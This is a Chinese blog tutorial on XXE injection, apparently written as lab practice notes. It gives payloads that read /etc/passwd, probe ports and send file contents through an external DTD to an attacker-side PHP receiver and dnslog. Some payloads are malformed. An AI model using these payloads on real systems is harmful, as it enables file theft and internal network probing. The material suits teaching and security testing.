【网络安全】XXE--XML外部实体注入

最新推荐文章于 2024-04-06 07:56:07 发布
最新推荐文章于 2024-04-06 07:56:07 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: web安全 xml java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41158271/article/details/130319616
版权

XXE

XXE定义

XML外部实体注入(XML EXTERNAL ENTITY)简称XXE漏洞,概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

XML初识

菜鸟xml概念

在这里插入图片描述

初识DTD

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>

!DOCTYPE note (第二行)定义此文档是 note 类型的文档。
!ELEMENT note (第三行)定义 note 元素有四个元素:“to、from、heading,、body”
!ELEMENT to (第四行)定义 to 元素为 “#PCDATA” 类型
!ELEMENT from (第五行)定义 from 元素为 “#PCDATA” 类型
!ELEMENT heading (第六行)定义 heading 元素为 “#PCDATA” 类型
!ELEMENT body (第七行)定义 body 元素为 “#PCDATA” 类型

解答疑虑1:!DOCTYPE是干什么用的

在这里插入图片描述

疑虑2:!ELEMENT是干什么用的

在这里插入图片描述

疑虑3:#PCDATA是干什么用的

在这里插入图片描述

疑虑4:为什么元素要再次声明类型

在这里插入图片描述

内部实体外部实体的区别
内部实体
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright runoob.com">

实体可以理解为变量
writer = Donald Duck.
copyright = Copyright runoob.com


如何引用:
元素标签内+ &writer;
例子:<heading>&writer;</heading>

总结:就是在xml内部进行定义变量,就是所谓的内部实体
外部实体
<!ENTITY writer SYSTEM "http://www.runoob.com/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.runoob.com/entities.dtd">

理解为:
writer = "http://www.runoob.com/entities.dtd"
copyright = "http://www.runoob.com/entities.dtd"
SYSTEM 在引用外部实体的时候需要加SYSTEM

如何引用:
元素标签内+ &writer;
例子:<heading>&writer;</heading>

总结:外部实体就是引用外部的文件
通用实体引用
创建文件aaa.dtd
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright runoob.com">

引用方式:
<?xml version='1.1' encoding='utf-8'>
<!DOCTYPE note [
<!ELEMENT % file SYSTEM "http://www.runoob.com/aaa.dtd>"
%file;
]>
<note>

xxe漏洞利用

有回显
判断靶场是否存在回显
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer "test">
]>
<name>&writer;</name>

在这里插入图片描述

利用file协议读取敏感信息
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'file:///etc/passwd'>
]>
<name>&writer;</name>

在这里插入图片描述

win 请读取文件c:/windows/win.ini

探测端口
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM '127.0.0.1:3306'>
]>
<name>&writer;</name>
无回显
利用http伪协议读取敏感信息
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>
]>
<name>&writer;</name>

在这里插入图片描述
在这里插入图片描述

利用服务器攻击服务器漏洞获取敏感信息(待补充)
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY % file SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>
5up4ga.dnslog.cn
<!ENTITY % remove SYSTEM 'http://192.168.0.22/home/kali/test/bbb.dtd'>
%remove; 
%all;
%send;
]>
<name>&writer;</name>

攻击方服务器启动目录准备php和dtd文件

<?
$file='./test.txt';
$content=base64_decode($_GET['file']);
file_put_contents($file,$content);
echo "\n";
?>

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://本地服务ip/php文件'?file=%file;'>"
>
利用dnslog平台检测是否访问
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY writer SYSTEM 'http://qw1j8c.dnslog.cn'>
]>
<name>&writer;</name>


<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY % writer SYSTEM 'http://qw1j8c.dnslog.cn'>
%writer;
]>

在这里插入图片描述

边缘拼命划水的小陈
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于XXE漏洞的网络安全分析与利用工具开发
05-07
当应用是通过用户上传的XML文件或POST请求进行数唱的传输,并日应用没有禁止XNML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞。 XXE漏洞发生在应用程序解析XML输入时,...
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5281
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
XML 外部实体注入
2201_75370376的博客
06-22 874
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
Xxe外部实体注入XML External Entity Injection)_externalmetadata
最新发布
m0_61549674的博客
04-06 781
网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。探测内网信息、攻击内网网站、读取本地文件、读取远程文件、读取php源码。
利用 XML 外部实体注入
blacklordking的博客
06-21 391
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体
xxe-xml外部实体注入
nigo134的博客
07-27 2867
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
测试XXE注入.docx
09-06
XXE 注入XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
渗透安全面试题库-v3.pdf
08-10
渗透安全网络安全领域的一个... - XXEXML外部实体注入):利用XML解析漏洞读取服务器文件或进行远程攻击。 这些知识点展示了渗透安全测试的深度和广度,涵盖了许多关键概念和技术,是网络安全专业人员必备的技能。
XXE超详细讲解 全网仅此一份
07-06
XXEXML External Entity injection)是一种安全漏洞,它发生在解析XML输入时,由于应用程序未能正确处理外部实体,攻击者能够注入恶意的XML实体,从而读取服务器上的敏感文件、执行系统命令或探测内网资源。...
XML实体攻击_从内网探测到命令执行步步惊心.pdf
09-11
XML实体攻击是一种针对基于XML的...总的来说,XML实体攻击是当前网络安全中不容忽视的问题。企业应当采取综合措施,包括技术防御、安全培训和威胁情报共享,来增强对这种攻击的防御能力,保护组织和个人的数据安全
【burpsuite安全练兵场-服务端10】XML外部实体注入XXE注入)-9个实验(全)
wangluoanquan111的博客
01-26 1031
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
XXEXML外部实体注入)详解
一期一会的博客
01-22 5166
XXE漏洞 XXE(XML External Entity Injection)又称为“XML外部实体注入漏洞”。 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 XML简介 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTM
(十二)XML外部实体XXE注入
weixin_43047908的博客
04-16 1743
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
XXE是什么?XXE漏洞原理及案例讲解(从0到1完全掌握XXE
白帽黑客八哥的博客
12-14 3837
XXEXML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击。XML文档可以定义实体,它们是存储文档中其他地方重复使用的数据的方式。外部实体是一种特殊类型的实体,它们的内容被定义在XML文档外部XXE漏洞发生在当应用程序解析含有外部实体引用的XML文档时,没有正确地限制或禁止这些外部实体的使用。XXE是一种严重的安全漏洞,它的存在可能导致严重的安全风险。开发人员和安全专家必须了解此类漏洞的工作原理,确保在处理XML数据时采取适当的安全措施,以保护应用程序和数据的安全
XML外部实体注入漏洞- XXE
weixin_40230278的博客
08-05 844
XML外部实体注入漏洞- XXE 概览: 实验内容 影响版本: 漏洞介绍 实验结果分析与总结 修复方案 实验内容 介绍XXE漏洞的触发方式和利用方法,简单介绍XXE漏洞的修复。 影响版本: libxml2.8.0版本 漏洞介绍 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击。漏洞是在对非安全外部实体...
XML外部实体注入XXE)的原理和应用
iczfy585的博客
08-27 5574
文章目录XXE注入一、XML简介二、XML实体三、CTF中XEE攻击 XXE注入 XXE注入全称是xml external entity 注入,也就是xml外部实体注入XXE漏洞发生在应用程序解析输入的XML时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行等攻击。 一、XML简介 XML是一种用户自定义的标记语言,主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD(document type define)来控制的。例如: <?xml version=
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值